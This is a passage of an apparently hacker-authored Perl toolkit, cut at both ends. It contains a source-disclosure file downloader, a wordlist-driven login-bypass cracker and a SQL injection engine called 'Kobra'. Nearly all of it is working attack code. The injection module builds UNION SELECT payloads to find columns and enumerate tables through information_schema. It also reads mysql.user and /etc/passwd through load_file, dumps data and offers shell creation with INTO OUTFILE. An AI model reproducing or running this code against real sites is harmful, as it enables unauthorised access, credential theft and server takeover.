  1526. @@@@@ @           @             @@@@@           @        
  1527. @                 @             @    @       @  @        
  1528. @                 @             @    @       @  @        
  1529. @     @ @ @@   @@@@  @@@  @@    @    @  @@@  @@ @ @@   @@
  1530. @@@@  @ @@  @ @   @ @   @ @     @@@@@      @ @  @@  @ @  @
  1531. @     @ @   @ @   @ @@@@@ @     @       @@@@ @  @   @  @  
  1532. @     @ @   @ @   @ @     @     @      @   @ @  @   @   @
  1533. @     @ @   @ @   @ @   @ @     @      @   @ @  @   @ @  @
  1534. @     @ @   @  @@@@  @@@  @     @       @@@@  @ @   @  @@
  1535.  
  1536.  
  1537.  
  1538.  
  1539.  
  1540. ", "text", "7", "5" );
  1541.     }
  1542.  
  1543. }    ##
  1544.  
  1545. sub load_fsd {
  1546.  
  1547.     head_fsd();
  1548.     my $page = printear( "[+] Page : ", "stdin", "11", "13" );
  1549.     ver_now_now($page);
  1550.     printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  1551.     <stdin>;
  1552.     estoydentro();
  1553.  
  1554.     sub ver_now_now {
  1555.  
  1556.         my $page = shift;
  1557.  
  1558.         printear( "\n[+] Target : " . $page . "\n\n", "text", "13", "5" );
  1559.  
  1560.         my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
  1561.  
  1562.         if ( $path =~ /\/(.*)$/ ) {
  1563.             my $me = $1;
  1564.             $code1 = toma( $page . $me );
  1565.             if ( $code1 =~ /header\((.*)Content-Disposition: attachment;/ig ) {
  1566.                 printear(
  1567.                     "[+] Full Source Discloure Detect\a\n", "text",
  1568.                     "7",                                    "5"
  1569.                 );
  1570.                 $code2 = toma( $page . "'" );
  1571.                 if ( $code2 =~
  1572.                     /No such file or directory in <b>(.*)<\/b> on line/ )
  1573.                 {
  1574.                     printear( "\n[+] Full Path Dislocure Detect : " . $1 . "\n",
  1575.                         "text", "7", "5" );
  1576.                 }
  1577.                 installer_fsd();
  1578.                 while (1) {
  1579.                     my $url = printear( "\n\nURL>", "stdin", "11", "13" );
  1580.                     if ( $url eq "exit" ) {
  1581.                         adios();
  1582.                     }
  1583.                     if ( download( $page . $url, "fsdlogs/" . basename($url) ) )
  1584.                     {
  1585.                         printear( "\n\n[+] File Downloaded\n",
  1586.                             "text", "13", "5" );
  1587.                         system( "start fsdlogs/" . basename($url) );
  1588.                     }
  1589.                 }
  1590.             }
  1591.             else {
  1592.                 printear( "[-] Web not vulnerable\n\n", "text", "5", "5" );
  1593.             }
  1594.         }
  1595.     }
  1596.  
  1597.     sub adios {
  1598.         printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  1599.         <stdin>;
  1600.         estoydentro();
  1601.     }
  1602.  
  1603.     sub head_fsd {
  1604.         clean();
  1605.         printear( "
  1606.  
  1607.  
  1608. @@@@@  @@@   @@@@       @@@@@ @     @ @@@@@  @      @@@@   @  @@@@@
  1609. @     @   @  @   @      @     @     @ @    @ @     @    @  @    @  
  1610. @     @      @    @     @      @   @  @    @ @     @    @  @    @  
  1611. @     @      @    @     @       @ @   @    @ @     @    @  @    @  
  1612. @@@@   @@@   @    @     @@@@     @    @@@@@  @     @    @  @    @  
  1613. @         @  @    @     @       @ @   @      @     @    @  @    @  
  1614. @         @  @    @     @      @   @  @      @     @    @  @    @  
  1615. @     @   @  @   @      @     @     @ @      @     @    @  @    @  
  1616. @      @@@   @@@@       @@@@@ @     @ @      @@@@@  @@@@   @    @  
  1617.  
  1618.  
  1619.  
  1620.  
  1621. ", "text", "7", "5" );
  1622.     }
  1623.  
  1624.     sub download {
  1625.         if ( $nave->mirror( $_[0], $_[1] ) ) {
  1626.             if ( -f $_[1] ) {
  1627.                 return true;
  1628.             }
  1629.         }
  1630.     }
  1631.  
  1632.     sub installer_fsd {
  1633.         unless ( -d "fsdlogs/" ) {
  1634.             mkdir( "fsdlogs/", "777" );
  1635.         }
  1636.     }
  1637.  
  1638. }    ##
  1639.  
  1640. sub load_bypass {
  1641.  
  1642.     head_bypass();
  1643.     start_com();
  1644.     printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  1645.     <stdin>;
  1646.     estoydentro();
  1647.  
  1648.     sub start_com {
  1649.         my $url = printear( "\n\n[+] Admin : ", "stdin", "11", "13" );
  1650.  
  1651.         my $code = toma($url);
  1652.  
  1653.         my @testar = HTML::Form->parse( $code, "/" );
  1654.  
  1655.         $count = 0;
  1656.         foreach my $test (@testar) {
  1657.             $count++;
  1658.             printear( "\n\n -- == Form $count == --\n\n", "text", "5", "5" );
  1659.             if ( $test->attr(name) eq "" ) {
  1660.                 printear( "[+] Name : No Found" . "\n", "text", "13", "5" );
  1661.             }
  1662.             else {
  1663.                 printear(
  1664.                     "[+] Name : " . $test->attr(name) . "\n", "text",
  1665.                     "13",                                     "5"
  1666.                 );
  1667.             }
  1668.             printear( "[+] Action : " . $test->action . "\n",
  1669.                 "text", "13", "5" );
  1670.             printear( "[+] Method : " . $test->method . "\n",
  1671.                 "text", "13", "5" );
  1672.             printear( "\n-- == Input == --\n\n", "text", "5", "5" );
  1673.             @inputs = $test->inputs;
  1674.  
  1675.             foreach $in (@inputs) {
  1676.                 printear( "\n[+] Type : " . $in->type . "\n",
  1677.                     "text", "13", "5" );
  1678.                 printear( "[+] Name : " . $in->name . "\n", "text", "13", "5" );
  1679.                 printear( "[+] Value : " . $in->value . "\n",
  1680.                     "text", "13", "5" );
  1681.             }
  1682.         }
  1683.  
  1684.         my $op  = printear( "\n\n[+] Form to crack : ", "stdin", "11", "13" );
  1685.         my $aca = printear( "\n[+] Submit : ",          "stdin", "11", "13" );
  1686.  
  1687.         printear( "\n[+] Options to check\n\n", "text", "5",  "5" );
  1688.         printear( "1 - Positive\n",             "text", "13", "5" );
  1689.         printear( "2 - Negative\n",             "text", "13", "5" );
  1690.         printear( "3 - Automatic\n\n",          "text", "13", "5" );
  1691.         my $op2 = printear( "[+] Option : ", "stdin", "11", "13" );
  1692.  
  1693.         my @bypass = loadwordsa();
  1694.  
  1695.         if ( $op2 eq "1" ) {
  1696.             my $st = printear( "\n[+] String : ", "stdin", "11", "13" );
  1697.             printear( "\n\n[+] Cracking login....\n\n", "text", "13", "5" );
  1698.             for my $by (@bypass) {
  1699.                 chomp $by;
  1700.                 my $code = load_nownow( $url, $code, $op, $aca, $by );
  1701.                 if ( $code =~ /$st/ig ) {
  1702.                     cracked( $url, $by );
  1703.                 }
  1704.             }
  1705.             printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  1706.             <stdin>;
  1707.             estoydentro();
  1708.         }
  1709.  
  1710.         if ( $op2 eq "2" ) {
  1711.             my $st = printear( "\n[+] String : ", "stdin", "11", "13" );
  1712.             printear( "\n\n[+] Cracking login....\n\n", "text", "13", "5" );
  1713.             for my $by (@bypass) {
  1714.                 chomp $by;
  1715.                 my $code = load_nownow( $url, $code, $op, $aca, $by );
  1716.                 unless ( $code =~ /$st/ig ) {
  1717.                     cracked( $url, $by );
  1718.                 }
  1719.             }
  1720.             printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  1721.             <stdin>;
  1722.             estoydentro();
  1723.         }
  1724.  
  1725.         if ( $op2 eq "3" ) {
  1726.             printear( "\n\n[+] Cracking login....\n\n", "text", "13", "5" );
  1727.             my $prueba_falsa =
  1728.               load_nownow( $url, $code, $op, $aca, "fuck you" );
  1729.             for my $by (@bypass) {
  1730.                 chomp $by;
  1731.                 my $code = load_nownow( $url, $code, $op, $aca, $by );
  1732.                 unless ( $code eq $prueba_falsa ) {
  1733.                     cracked( $url, $by );
  1734.                 }
  1735.             }
  1736.             printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  1737.             <stdin>;
  1738.             estoydentro();
  1739.         }
  1740.     }
  1741.  
  1742.     sub load_nownow {
  1743.  
  1744.         my ( $url, $code, $op, $aca, $text ) = @_;
  1745.  
  1746.         $op--;
  1747.         my @probar = ( HTML::Form->parse( $code, "/" ) )[$op];
  1748.  
  1749.         for my $testa (@probar) {
  1750.             if ( $testa->method eq "POST" ) {
  1751.  
  1752.                 my @inputs = $testa->inputs;
  1753.                 for my $in (@inputs) {
  1754.                     if ( $in->type eq "submit" ) {
  1755.                         if ( $in->name eq $aca ) {
  1756.                             push( @botones_names,  $in->name );
  1757.                             push( @botones_values, $in->value );
  1758.                         }
  1759.                     }
  1760.                     else {
  1761.                         push( @ordenuno, $in->name, $text );
  1762.                     }
  1763.                 }
  1764.  
  1765.                 my @preuno = @ordenuno;
  1766.                 push( @preuno, $botones_names[0], $botones_values[0] );
  1767.                 my $codeuno = $nave->post( $url, \@preuno )->content;
  1768.  
  1769.                 return $codeuno;
  1770.  
  1771.             }
  1772.             else {
  1773.  
  1774.                 my $final    = "";
  1775.                 my $orden    = "";
  1776.                 my $partedos = "";
  1777.  
  1778.                 my @inputs = $testa->inputs;
  1779.                 for my $testa (@inputs) {
  1780.  
  1781.                     if ( $testa->name eq $aca ) {
  1782.  
  1783.                         push( @botones_names,  $testa->name );
  1784.                         push( @botones_values, $testa->value );
  1785.                     }
  1786.                     else {
  1787.                         $orden .= '' . $testa->name . '=' . $text . '&';
  1788.                     }
  1789.                 }
  1790.                 chop($orden);
  1791.  
  1792.                 my $partedos =
  1793.                   "&" . $botones_names[0] . "=" . $botones_values[0];
  1794.                 my $final = $url . "?" . $orden . $partedos;
  1795.  
  1796.                 $codedos = toma($final);
  1797.                 return $codedos;
  1798.             }
  1799.         }
  1800.     }
  1801.  
  1802.     sub cracked {
  1803.         printear( "\a\a[+] Login Cracked\n\n", "text", "7", "5" );
  1804.         printear( "[+] URL : $_[0]\n",         "text", "7", "5" );
  1805.         printear( "[+] Bypass : $_[1]\n",      "text", "7", "5" );
  1806.         savefile( "logs-bypass.txt", "[+] URL : $_[0]" );
  1807.         savefile( "logs-bypass.txt", "[+] Bypass : $_[1]\n" );
  1808.         printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  1809.         <stdin>;
  1810.         estoydentro();
  1811.     }
  1812.  
  1813.     sub loadwordsa {
  1814.  
  1815.         my $file = "bypass.txt";
  1816.  
  1817.         if ( -f $file ) {
  1818.  
  1819.             open( FI, "bypass.txt" );
  1820.             my @txts = <FI>;
  1821.             close FI;
  1822.             chomp @txts;
  1823.  
  1824.             return @txts;
  1825.  
  1826.         }
  1827.         else {
  1828.             printear( "\n\n[-] Wordlist not found\n\n", "text", "5", "5" );
  1829.         }
  1830.  
  1831.     }
  1832.  
  1833.     sub head_bypass {
  1834.         clean();
  1835.         printear( "
  1836.  
  1837. @@@@        @@@@@                       @        @         @      
  1838. @   @       @    @                      @        @                
  1839. @   @       @    @                     @ @       @                
  1840. @   @  @  @ @    @  @@@   @@   @@      @ @    @@@@ @@@ @@  @ @ @@
  1841. @@@@   @  @ @@@@@      @ @  @ @  @    @   @  @   @ @  @  @ @ @@  @
  1842. @   @  @  @ @       @@@@  @    @      @   @  @   @ @  @  @ @ @   @
  1843. @   @  @  @ @      @   @   @    @     @@@@@  @   @ @  @  @ @ @   @
  1844. @   @   @@  @      @   @ @  @ @  @   @     @ @   @ @  @  @ @ @   @
  1845. @@@@    @   @       @@@@  @@   @@    @     @  @@@@ @  @  @ @ @   @
  1846.         @                                                        
  1847.       @@                                                          
  1848.  
  1849.  
  1850.  
  1851. ", "text", "7", "5" );
  1852.     }
  1853.  
  1854. }    ##
  1855.  
  1856. sub load_kobra {
  1857.  
  1858.     installer_kobra();
  1859.     clean();
  1860.  
  1861.     &head_kobra;
  1862.     &menu_kobra;
  1863.  
  1864.     printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  1865.     <stdin>;
  1866.     estoydentro();
  1867.  
  1868.     sub menu_kobra {
  1869.         my $page = printear( "[Page] : ", "stdin", "11", "13" );
  1870.         my $bypass =
  1871.           printear( "\n[Bypass : -- /* %20] : ", "stdin", "11", "13" );
  1872.         print "\n\n";
  1873.         if ( $page eq "exit" ) {
  1874.             printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  1875.             <stdin>;
  1876.             estoydentro();
  1877.         }
  1878.         &scan_kobra( $page, $bypass );
  1879.     }
  1880.  
  1881.     sub scan_kobra {
  1882.         my $page = $_[0];
  1883.         printear( "[Status] : Scanning.....\n", "text", "13", "5" );
  1884.         ( $pass1, $bypass2 ) = &bypass( $_[1] );
  1885.  
  1886.         my $save = partimealmedio( $_[0] );
  1887.  
  1888.         if ( $_[0] =~ /hackman/ig ) {
  1889.             savefilear( $save . ".txt", "\n[Target Confirmed] : $_[0]\n" );
  1890.             &menu_options( $_[0], $_[1], $save );
  1891.         }
  1892.  
  1893.         my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 );
  1894.         my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 );
  1895.  
  1896.         unless ( $testar1 eq $testar2 ) {
  1897.             motor( $page, $_[1] );
  1898.         }
  1899.         else {
  1900.             printear( "\n[-] Not vulnerable\n\n", "text", "5", "5" );
  1901.             my $op = printear( "[+] Scan anyway y/n : ", "stdin", "11", "13" );
  1902.             if ( $op eq "y" ) {
  1903.                 motor( $page, $_[1] );
  1904.             }
  1905.             else {
  1906.                 head_kobra();
  1907.                 menu_kobra();
  1908.             }
  1909.         }
  1910.  
  1911.     }
  1912.  
  1913.     sub motor {
  1914.  
  1915.         my ( $gen, $save, $control ) = &length( $_[0], $_[1] );
  1916.  
  1917.         if ( $control eq 1 ) {
  1918.             printear( "\n[Status] : Enjoy the menu\n\n", "text", "13", "5" );
  1919.             &menu_options( $gen, $_[1], $save );
  1920.         }
  1921.         else {
  1922.             printear( "[Status] : Length columns not found\n\n",
  1923.                 "text", "5", "5" );
  1924.             <STDIN>;
  1925.             &head_kobra;
  1926.             &menu_kobra;
  1927.         }
  1928.     }
  1929.  
  1930.     sub head_kobra {
  1931.         clean();
  1932.         printear( "
  1933. @      @@   @            
  1934. @@     @  @ @@            
  1935. @ @@  @  @  @ @   @ @ @@@
  1936. @ @   @  @  @@ @ @@@ @  @
  1937. @@    @  @  @  @  @   @@@
  1938. @ @   @  @  @  @  @  @  @
  1939. @@@ @   @@   @@@  @@@ @@@@@
  1940.  
  1941.  
  1942.  
  1943.  
  1944. ", "text", "7", "5" );
  1945.     }
  1946.  
  1947.     sub length {
  1948.         printear(
  1949.             "\n[+] Looking for the number of columns\n\n", "text",
  1950.             "13",                                          "5"
  1951.         );
  1952.         my $rows = "0";
  1953.         my $asc;
  1954.         my $page = $_[0];
  1955.         ( $pass1, $pass2 ) = &bypass( $_[1] );
  1956.  
  1957.         $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
  1958.         $total = "1";
  1959.         for my $rows ( 2 .. 200 ) {
  1960.             $asc .= "," . "char("
  1961.               . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
  1962.             $total .= "," . $rows;
  1963.             $injection =
  1964.                 $page . "1"
  1965.               . $pass1 . "and"
  1966.               . $pass1 . "1=0"
  1967.               . $pass1 . "union"
  1968.               . $pass1
  1969.               . "select"
  1970.               . $pass1
  1971.               . $alert
  1972.               . $asc;
  1973.             $test = toma($injection);
  1974.             if ( $test =~ /RATSXPDOWN/ ) {
  1975.                 @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
  1976.                 $control = 1;
  1977.  
  1978.                 my $save = partimealmedio( $_[0] );
  1979.  
  1980.                 savefilear( $save . ".txt", "\n[Target confirmed] : $page" );
  1981.                 savefilear( $save . ".txt", "[Bypass] : $_[1]\n" );
  1982.                 savefilear( $save . ".txt",
  1983.                     "[Limit] : The site has $rows columns" );
  1984.                 savefilear( $save . ".txt",
  1985.                     "[Data] : The number @number print data" );
  1986.                 $total =~ s/$number[0]/hackman/;
  1987.                 savefilear(
  1988.                     $save . ".txt",
  1989.                     "[SQLI] : "
  1990.                       . $page . "1"
  1991.                       . $pass1 . "and"
  1992.                       . $pass1 . "1=0"
  1993.                       . $pass1 . "union"
  1994.                       . $pass1
  1995.                       . "select"
  1996.                       . $pass1
  1997.                       . $total
  1998.                 );
  1999.                 return (
  2000.                     $page . "1"
  2001.                       . $pass1 . "and"
  2002.                       . $pass1 . "1=0"
  2003.                       . $pass1 . "union"
  2004.                       . $pass1
  2005.                       . "select"
  2006.                       . $pass1
  2007.                       . $total,
  2008.                     $save, $control
  2009.                 );
  2010.             }
  2011.         }
  2012.     }
  2013.  
  2014.     sub details {
  2015.         my ( $page, $bypass, $save ) = @_;
  2016.         ( $pass1, $pass2 ) = &bypass($bypass);
  2017.         savefilear( $save . ".txt", "\n" );
  2018.         if ( $page =~ /(.*)hackman(.*)/ig ) {
  2019.             printear( "[+] Searching information..\n\n", "text", "13", "5" );
  2020.             my ( $start, $end ) = ( $1, $2 );
  2021.             $inforschema =
  2022.                 $start
  2023.               . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  2024.               . $end
  2025.               . $pass1 . "from"
  2026.               . $pass1
  2027.               . "information_schema.tables"
  2028.               . $pass2;
  2029.             $mysqluser =
  2030.                 $start
  2031.               . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  2032.               . $end
  2033.               . $pass1 . "from"
  2034.               . $pass1
  2035.               . "mysql.user"
  2036.               . $pass2;
  2037.             $test3 =
  2038.               toma( $start
  2039.                   . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
  2040.                   . $end
  2041.                   . $pass2 );
  2042.             $test1 = toma($inforschema);
  2043.             $test2 = toma($mysqluser);
  2044.             if ( $test2 =~ /ERTOR854/ig ) {
  2045.                 savefilear( $save . ".txt", "[mysql.user] : ON" );
  2046.                 printear( "[mysql.user] : ON\n", "text", "7", "5" );
  2047.             }
  2048.             else {
  2049.                 printear( "[mysql.user] : OFF\n", "text", "5", "5" );
  2050.                 savefilear( $save . ".txt", "[mysql.user] : OFF" );
  2051.             }
  2052.             if ( $test1 =~ /ERTOR854/ig ) {
  2053.                 printear( "[information_schema.tables] : ON\n",
  2054.                     "text", "7", "5" );
  2055.                 savefilear( $save . ".txt",
  2056.                     "[information_schema.tables] : ON" );
  2057.             }
  2058.             else {
  2059.                 printear( "[information_schema.tables] : OFF\n",
  2060.                     "text", "5", "5" );
  2061.                 savefilear( $save . ".txt",
  2062.                     "[information_schema.tables] : OFF" );
  2063.             }
  2064.             if ( $test3 =~ /ERTOR854/ig ) {
  2065.                 printear( "[load_file] : ON\n", "text", "7", "5" );
  2066.                 savefilear(
  2067.                     $save . ".txt",
  2068.                     "[load_file] : "
  2069.                       . $start
  2070.                       . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
  2071.                       . $end
  2072.                       . $pass2
  2073.                 );
  2074.             }
  2075.             $concat =
  2076. "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  2077.             $injection = $start . $concat . $end . $pass2;
  2078.             $code      = toma($injection);
  2079.             if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
  2080.                 printear(
  2081. "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] Username : $3\n\n",
  2082.                     "text", "7", "5"
  2083.                 );
  2084.                 savefilear(
  2085.                     $save . ".txt",
  2086. "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] Username : $3\n"
  2087.                 );
  2088.             }
  2089.             else {
  2090.                 printear( "\n[-] Not found any data\n", "text", "5", "5" );
  2091.             }
  2092.         }
  2093.     }
  2094.  
  2095.     sub menu_options {
  2096.  
  2097.         my $testarnownow = $_[0];    ## Comment on this line to compile to exe
  2098.         $SIG{INT} =
  2099.           sub { reload($testarnownow) }; ## Comment on this line to compile to exe
  2100.  
  2101.         head_kobra();
  2102.  
  2103.         printear( "[Target confirmed] : $_[0]\n", "text", "11", "5" );
  2104.         printear( "[Bypass] : $_[1]\n\n",         "text", "11", "5" );
  2105.  
  2106.         my $save = partimealmedio( $_[0] );
  2107.  
  2108.         printear( "[save] : /logs/webs/$save\n\n", "text", "11", "5" );
  2109.  
  2110.         printear( "\n--== information_schema.tables ==--\n\n",
  2111.             "text", "5", "5" );
  2112.         printear( "[1] : Show tables\n",                  "text", "13", "5" );
  2113.         printear( "[2] : Show columns\n",                 "text", "13", "5" );
  2114.         printear( "[3] : Show DBS\n",                     "text", "13", "5" );
  2115.         printear( "[4] : Show tables with other DB\n",    "text", "13", "5" );
  2116.         printear( "[5] : Show columns with other DB",     "text", "13", "5" );
  2117.         printear( "\n\n--== mysql.user ==--\n\n",         "text", "5",  "5" );
  2118.         printear( "[6] : Show users\n",                   "text", "13", "5" );
  2119.         printear( "\n--== Others ==--\n\n",               "text", "5",  "5" );
  2120.         printear( "[7] : Fuzz tables\n",                  "text", "13", "5" );
  2121.         printear( "[8] : Fuzz Columns\n",                 "text", "13", "5" );
  2122.         printear( "[9] : Fuzzing files with load_file\n", "text", "13", "5" );
  2123.         printear( "[10] : Read a file with load_file\n",  "text", "13", "5" );
  2124.         printear( "[11] : Dump\n",                        "text", "13", "5" );
  2125.         printear( "[12] : Informacion of the server\n",   "text", "13", "5" );
  2126.         printear( "[13] : Create a shell with into outfile\n",
  2127.             "text", "13", "5" );
  2128.         printear( "[14] : Show Log\n",      "text", "13", "5" );
  2129.         printear( "[15] : Change Target\n", "text", "13", "5" );
  2130.         printear( "[16] : Exit\n",          "text", "13", "5" );
  2131.  
  2132.         my $opcion = printear( "\n\n[Option] : ", "stdin", "11", "13" );
  2133.  
  2134.         if ( $opcion eq "1" ) {
  2135.             schematables( $_[0], $_[1], $save );
  2136.             &reload;
  2137.         }
  2138.         elsif ( $opcion eq "2" ) {
  2139.             my $tabla = printear( "\n\n[Table] : ", "stdin", "11", "13" );
  2140.             schemacolumns( $_[0], $_[1], $save, $tabla );
  2141.             &reload;
  2142.         }
  2143.         elsif ( $opcion eq "3" ) {
  2144.             &schemadb( $_[0], $_[1], $save );
  2145.             &reload;
  2146.         }
  2147.         elsif ( $opcion eq "4" ) {
  2148.             my $data = printear( "\n\n[DAtabase] : ", "stdin", "11", "13" );
  2149.             &schematablesdb( $_[0], $_[1], $data, $save );
  2150.             &reload;
  2151.         }
  2152.         elsif ( $opcion eq "5" ) {
  2153.             my $db    = printear( "\n\n[DB] : ",  "stdin", "11", "13" );
  2154.             my $table = printear( "\n[Table] : ", "stdin", "11", "13" );
  2155.             &schemacolumnsdb( $_[0], $_[1], $db, $table, $save );
  2156.             &reload;
  2157.         }
  2158.         elsif ( $opcion eq "6" ) {
  2159.             &mysqluser( $_[0], $_[1], $save );
  2160.             &reload;
  2161.         }
  2162.         elsif ( $opcion eq "7" ) {    ##
  2163.             &fuzz( $_[0], $_[1], $save );
  2164.             &reload;
  2165.         }
  2166.         elsif ( $opcion eq "8" ) {    ##
  2167.             my $table = printear( "\n\n[Table] : ", "stdin", "11", "13" );
  2168.             &fuzzcol( $_[0], $_[1], $table, $save );
  2169.             &reload;
  2170.         }
  2171.         elsif ( $opcion eq "9" ) {
  2172.             &load( $_[0], $_[1], $save );
  2173.             &reload;
  2174.         }
  2175.         elsif ( $opcion eq "10" ) {
  2176.             &loadfile( $_[0], $_[1], $save );
  2177.             &reload;
  2178.         }
  2179.         elsif ( $opcion eq "11" ) {
  2180.             my $tabla =
  2181.               printear( "\n\n[Table to dump] : ", "stdin", "11", "13" );
  2182.             my $col1 = printear( "\n[Column 1] : ", "stdin", "11", "13" );
  2183.             my $col2 = printear( "\n[Column 2] : ", "stdin", "11", "13" );
  2184.             print "\n\n";
  2185.             &dump( $_[0], $col1, $col2, $tabla, $_[1], $save );
  2186.             &reload;
  2187.         }
  2188.         elsif ( $opcion eq "12" ) {
  2189.             print "\n\n";
  2190.             &details( $_[0], $_[1], $save );
  2191.             &reload;
  2192.         }
  2193.         elsif ( $opcion eq "13" ) {
  2194.             my $path =
  2195.               printear( "\n\n[Full Path Discloure] : ", "stdin", "11", "13" );
  2196.             &into( $_[0], $_[1], $path, $save );
  2197.             &reload;
  2198.         }
  2199.         elsif ( $opcion eq "14" ) {
  2200.             $t = "logs/webs/$save.txt";
  2201.             system("start $t");
  2202.             &reload;
  2203.         }
  2204.         elsif ( $opcion eq "15" ) {
  2205.             &head_kobra;
  2206.             &menu_kobra;
  2207.         }
  2208.  
  2209.         elsif ( $opcion eq "16" ) {
  2210.             printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  2211.             <stdin>;
  2212.             estoydentro();
  2213.         }
  2214.         else {
  2215.             &reload;
  2216.         }
  2217.     }
  2218.  
  2219.     sub schematables {
  2220.  
  2221.         $real = "1";
  2222.         my ( $page, $bypass, $save ) = @_;
  2223.         savefilear( $save . ".txt", "\n" );
  2224.         print "\n";
  2225.         my $page1 = $page;
  2226.         ( $pass1, $pass2 ) = &bypass( $_[1] );
  2227.         savefilear( $save . ".txt", "[DB] : default" );
  2228.         printear( "\n[+] Searching tables with schema\n\n", "text", "13", "5" );
  2229.         $page =~
  2230. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  2231.         $page1 =~
  2232. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  2233.         $code =
  2234.           toma( $page1
  2235.               . $pass1 . "from"
  2236.               . $pass1
  2237.               . "information_schema.tables"
  2238.               . $pass2 );
  2239.  
  2240.         if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  2241.             my $resto = $1;
  2242.             $total = $resto - 17;
  2243.             printear( "[+] Tables Length :  $total\n\n", "text", "13", "5" );
  2244.             savefilear( $save . ".txt", "[+] Searching tables with schema\n" );
  2245.             savefilear( $save . ".txt", "[+] Tables Length :  $total\n" );
  2246.             my $limit = $1;
  2247.             for my $limit ( 17 .. $limit ) {
  2248.                 $code1 =
  2249.                   toma( $page
  2250.                       . $pass1 . "from"
  2251.                       . $pass1
  2252.                       . "information_schema.tables"
  2253.                       . $pass1 . "limit"
  2254.                       . $pass1
  2255.                       . $limit . ",1"
  2256.                       . $pass2 );
  2257.  
  2258. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2."\n";
  2259.                 if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  2260.                     my $table = $1;
  2261.                     chomp $table;
  2262.                     printear( "[Table $real Found : $table ]\n",
  2263.                         "text", "7", "5" );
  2264.                     savefilear( $save . ".txt",
  2265.                         "[Table $real Found : $table ]" );
  2266.                     $real++;
  2267.                 }
  2268.             }
  2269.         }
  2270.         else {
  2271.             printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" );
  2272.         }
  2273.     }
  2274.  
  2275.     sub reload {
  2276.         printear( "\n\n[+] Finish\n\n", "text", "11", "5" );
  2277.         <STDIN>;
  2278.         &head_kobra;
  2279.         &menu_options;
  2280.     }
  2281.  
  2282.     sub schemacolumns {
  2283.         my ( $page, $bypass, $save, $table ) = @_;
  2284.         my $page3 = $page;
  2285.         my $page4 = $page;
  2286.         savefilear( $save . ".txt", "\n" );
  2287.         print "\n";
  2288.         ( $pass1, $pass2 ) = &bypass($bypass);
  2289.         printear( "\n[DB] : default\n", "text", "13", "5" );
  2290.         savefilear( $save . ".txt", "[DB] : default" );
  2291.         savefilear( $save . ".txt", "[Table] : $table\n" );
  2292.         $page3 =~
  2293. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  2294.         $code3 =
  2295.           toma( $page3
  2296.               . $pass1 . "from"
  2297.               . $pass1
  2298.               . "information_schema.columns"
  2299.               . $pass1 . "where"
  2300.               . $pass1
  2301.               . "table_name=char("
  2302.               . ascii($table) . ")"
  2303.               . $pass2 );
  2304.  
  2305.         if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  2306.             printear( "\n[Columns Length : $1 ]\n\n", "text", "13", "5" );
  2307.             savefilear( $save . ".txt", "[Columns Length : $1 ]\n" );
  2308.             my $si = $1;
  2309.             chomp $si;
  2310.             $page4 =~
  2311. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  2312.             $real = "1";
  2313.             for my $limit2 ( 0 .. $si ) {
  2314.                 $code4 =
  2315.                   toma( $page4
  2316.                       . $pass1 . "from"
  2317.                       . $pass1
  2318.                       . "information_schema.columns"
  2319.                       . $pass1 . "where"
  2320.                       . $pass1
  2321.                       . "table_name=char("
  2322.                       . ascii($table) . ")"
  2323.                       . $pass1 . "limit"
  2324.                       . $pass1
  2325.                       . $limit2 . ",1"
  2326.                       . $pass2 );
  2327.                 if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  2328.                     printear( "[Column $real] : $1\n", "text", "7", "5" );
  2329.                     savefilear( $save . ".txt", "[Column $real] : $1" );
  2330.                     $real++;
  2331.                 }
  2332.             }
  2333.         }
  2334.         else {
  2335.             printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" );
  2336.         }
  2337.     }
  2338.  
  2339.     sub schemadb {
  2340.         my ( $page, $bypass, $save ) = @_;
  2341.         my $page1 = $page;
  2342.         savefilear( $save . ".txt", "\n" );
  2343.         printear( "\n\n[+] Searching DBS\n\n", "text", "13", "5" );
  2344.         ( $pass1, $pass2 ) = &bypass($bypass);
  2345.         $page =~
